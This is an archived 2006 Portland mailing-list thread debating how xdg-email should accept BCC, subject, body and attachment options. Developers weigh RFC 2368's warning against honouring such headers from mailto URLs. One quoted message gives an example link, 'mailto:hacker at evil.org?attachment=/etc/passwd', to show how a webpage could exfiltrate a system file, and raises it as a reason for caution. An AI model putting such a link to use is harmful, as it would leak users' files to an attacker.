[Portland] RE: xdg-email BCC

Bastian, Waldo waldo.bastian at intel.com
Fri Jun 2 16:08:47 PDT 2006


Yes.. I think there is no doubt about the required capabilities. It's
more an issue of how to expose those capabilities in the command line
interface. Which of the following three forms should be supported?

1) xdg-email 'mailto:jwhite at codeweavers.com?subject=Logo contest&' \
          'body=Attached you find the logo for the contest.&' \
          'attachment=/tmp/logo.png&bcc=bastian at kde.org'

2) xdg-email --attachment /tmp/logo.png -bcc bastian at kde.org \
          'mailto:jwhite at codeweavers.com?subject=Logo contest&' \
          'body=Attached you find the logo for the contest.'
          
3) xdg-email --attachment /tmp/logo.png -bcc bastian at kde.org \
          --subject 'Logo contest' \
          --body 'Attached you find the logo for the contest.' \
          jwhite at codeweavers.com

I'm inclined to answer that with 2) and 3)

Especially since 2) should actually be:
2) xdg-email --attachment /tmp/logo.png -bcc bastian at kde.org \
          'mailto:jwhite at codeweavers.com?subject=Logo%20contest&' \
 
'body=Attached%20you%20find%20the%20logo%20for%20the%20contest.'

Waldo Bastian
Linux Client Architect - Client Linux Foundation Technology
Channel Platform Solutions Group
Intel Corporation - http://www.intel.com/go/linux
OSDL DTL Tech Board Chairman

>-----Original Message-----
>From: Bryce Harrington [mailto:bryce at osdl.org]
>Sent: Friday, June 02, 2006 3:57 PM
>To: Bastian, Waldo
>Cc: Whipple, Tom; portland at lists.freedesktop.org
>Subject: Re: [Portland] RE: xdg-email BCC
>
>Well, the ability to do attachments would be one of the principle use
>cases for applications using xdg.  Specifically, I'm thinking of
>something like, File -> Mail-To, that would allow a user to email
>whatever document they're working on to someone else.
>
>Without an attachment capability, this would still be useful for
>feedback links (maybe for sending in bug reports), but I think that's a
>secondary use.
>
>Anyway, so I think this distinguishes our usage from what this RFC is
>targetting.  (I don't have an opinion on whether BCC would be useful to
>include, but if we are supporting TO and CC, then why not?)
>
>Bryce
>
>On Fri, Jun 02, 2006 at 03:23:23PM -0700, Bastian, Waldo wrote:
>> [CC'ing Portland list]
>>
>> Well RFC2368 was written with the web in mind. Our use case here is
>slightly different, we want to give applications the possibility to
invoke
>a mailer. The points made in the RFC remain valid though, so maybe we
>should offer explicit options for BCC and Attachment but not honour
these
>options when they are part of the URL. Maybe we should go even further
and
>offer all other options as an explicit command line options as well,
which
>might be convenient in case you have the individual elements at hand
but
>not a URL. What do other people think?
>>
>> Waldo Bastian
>> Linux Client Architect - Client Linux Foundation Technology
>> Channel Platform Solutions Group
>> Intel Corporation - http://www.intel.com/go/linux
>> OSDL DTL Tech Board Chairman
>> ________________________________________
>> From: Whipple, Tom
>> Sent: Friday, June 02, 2006 3:03 PM
>> To: Bastian, Waldo
>> Subject: xdg-email BCC
>>
>> >From the description in the xdg-email manpage:
>>
>> "mailto-uri may contain ... bcc, subject, body and attachment."
>>
>> However, from section 7 of RFC2368
>>
>> ?? A mail client should never send anything without complete
disclosure
>> ?? to the user of what is will be sent; it should disclose not only
the
>> ?? message destination, but also any headers. Unrecognized headers,
or
>> ?? headers with values inconsistent with those the mail client would
>> ?? normally send should be especially suspect. MIME headers (MIME-
>> ?? Version, Content-*) are most likely inappropriate, as are those
>> ?? relating to routing (From, Bcc, Apparently-To, etc.)
>>
>> ?? Note that some headers are inherently unsafe to include in a
message
>> ?? generated from a URL. For example, headers such as "From:",
"Bcc:",
>> ?? and so on, should never be interpreted from a URL. In general, the
>> ?? fewer headers interpreted from the URL, the less likely it is that
a
>> ?? sending agent will create an unsafe message.
>>
>> So, I don't think Bcc should be mentioned in the manpage. But, this
is a
>"should not" so I don't think we need to test to see that this is NOT
>supported.
>>
>> Also, attachment is not mentioned in the RFC. I don't know if we want
to
>think about it here and now, but what if I made a webpage with a link
such
>as 'mailto:hacker at evil.org?attachment=/etc/passwd'. It seems that this
>would also be a security consideration.
>>
>> -tom
>> _______________________________________________
>> Portland mailing list
>> Portland at lists.freedesktop.org
>> http://lists.freedesktop.org/mailman/listinfo/portland


More information about the Portland mailing list